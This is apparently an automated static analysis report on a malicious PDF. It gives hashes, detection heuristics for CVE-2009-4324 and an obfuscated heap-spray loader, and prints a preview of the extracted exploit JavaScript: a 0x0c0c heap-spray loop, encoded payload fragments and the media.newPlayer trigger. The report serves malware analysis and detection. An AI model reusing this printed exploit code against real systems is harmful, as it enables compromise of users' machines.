Malicious PDF — malware analysis report

Static analysis result for SHA-256 e07ff198e39335c1…

Verdict: MALICIOUS
File type: PDF
Size: 1.17 MB
Created: 2009-12-17 03:14:38 +08:00
Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 7.0.5 (Windows))
First seen: 2026-05-11
MD5: e61422a5f59c750f9904fd3baf7a52f2
SHA-1: e80a8cede1116a5bf6e6f7ef8c87dea6995ac513
SHA-256: e07ff198e39335c1b60a1ab09dbef35bf17b7fd2471300e67d84828da3997a4e
Risk score: 220

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged as malicious by an ML classifier and contains embedded JavaScript. The JavaScript stream, named 'javascript_obj0031_000.js', is likely responsible for the malicious behavior. While the exact actions of the script are not fully detailed, its presence within a suspicious PDF strongly suggests it's designed to download and execute a second-stage payload or perform other malicious actions.

Machine Learning

  • Nyx PDF Classifier: malicious score 0.9997

Heuristics (9)

  • media.newPlayer — CVE-2009-4324 (critical; CVE exact; rule CVE_2009_4324)
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (Matched in decompressed stream.)
  • JavaScript action (low; 2 related findings; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit (critical; CVE related; rule PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY)
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • Embedded JS stream (low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY)
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Embedded file (low; rule PDF_EMBEDDED)
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload.
  • Object number defined twice with different bodies (info; rule PDF_DUPLICATE_OBJ_BODY_INCREMENTAL)
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found (all in PDF document text):
      • http://www.w3.org/1999/02/22-rdf-syntax-ns#
      • http://ns.adobe.com/pdf/1.3/
      • http://ns.adobe.com/xap/1.0/
      • http://purl.org/dc/elements/1.1/
      • http://ns.adobe.com/xap/1.0/mm/

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
k1 | pdf-embedded-file | PDF EmbeddedFile object 26 at offset 0x1EC1 | 2041 bytes
SHA-256: a6d0585170a841c5849588fd4636792246e419fa4aea0683aa4a831c8dab0139
javascript_obj0031_000.js | pdf-javascript-stream | PDF /JS object 31 at offset 0x12B202 | 4833 bytes
SHA-256: 67d16badf36b4d8c67c0c47adb9f01a2eaa60fa09fbb30364a16791a02d36c18
Detection
ClamAV: No threats found
Obfuscation or payload: likely
21 of 40 identifiers look randomly generated (e.g. 'QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkm') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV=unescape;
var IKksdghdfda="dfodjffFFhsdeEEgsdnnvnVCOpUJH";
var UJNyhbTGVrfc =  PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV(/* %u-escaped shellcode literal omitted from this preview */);
var yiojnhttewqwsxfguUJHTredDEEdfgGREWswqwASDGhHNJIIOoytFGV="QAAzweeRDFCfttyyHVBVJHjiKJJhgfFFvbhjJKIUytrfFGfdfg";
var QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh = PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV("\x25\x750\x630\x63\x25\x750\x630\x63");
var QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY = PKNojbIGVtfxESZqscEFVrgnTJMrfvWSxyhNujV("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858\x25\x756371%u717a%u7672%u626e%u626e\x25\x75455a%u4243%u6764%u7646\x25\x75696b%u6a6e%u4e61%u6c6d\x25\x757350\x25\x755168\x25\x757171\x25\x755574");
while(QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.length <= 33500) QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh+=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh;
	QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.substring(0,33500 - UJNyhbTGVrfc.length);
var EDVGYujmkoQAZxdr=Array;
var OIYTfcdeERHnbCDSetjjkk="ETmnsdbfDSXvnkfkjhbDSsdFBb";
memRDXCFTYGVbhu=new EDVGYujmkoQAZxdr();
var RYHJNBVCwssxcftyUIKKMNGr="WSSDCCGTYygvBHJUIikmnmM<KOPplkuYTFfeweSDDgghYUUh";
for(i=0;i<0x1000;i++) {
	memRDXCFTYGVbhu[i]= QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh + UJNyhbTGVrfc;
}
var EYIjndbsfedfSDWvbsdbndjAkvp=util;
EYIjndbsfedfSDWvbsdbndjAkvp.printd("QAzwsxQWEedcERTertFCVCrtghVBbnuytTHN", new Date());
EYIjndbsfedfSDWvbsdbndjAkvp.printd("BjEdcRFvtGBBjhuIJnOkmSsXDFtGByhUjFqR", new Date());
var fduiJgDRRecVJkopOiytFGH=this;
try {fduiJgDRRecVJkopOiytFGH.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);} catch(e) {}
var QETYuijjGDSXcvBJIIOutfWQAsDFFGg=util;
QETYuijjGDSXcvBJIIOutfWQAsDFFGg.printd(QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY, new Date());
var WSXDREDcgtYHBNMNujiKEtyhfdVBNMNikJGResd="QRSFXCHVjhbKnGUFvhBmbKLJOLJNnFREdcsaXBJHIOiofd";
generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (split-literal-normalize) from JavaScript object 31 at offset 0x12B202 | 4631 bytes
SHA-256: 12472f8407165c40f4a229cea7b6f3a14affe4fcf487bfa659e6688aaca9b083
Detection
ClamAV: No threats found
Obfuscation or payload: likely
21 of 34 identifiers look randomly generated (e.g. 'QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkm') — consistent with name-mangling obfuscation.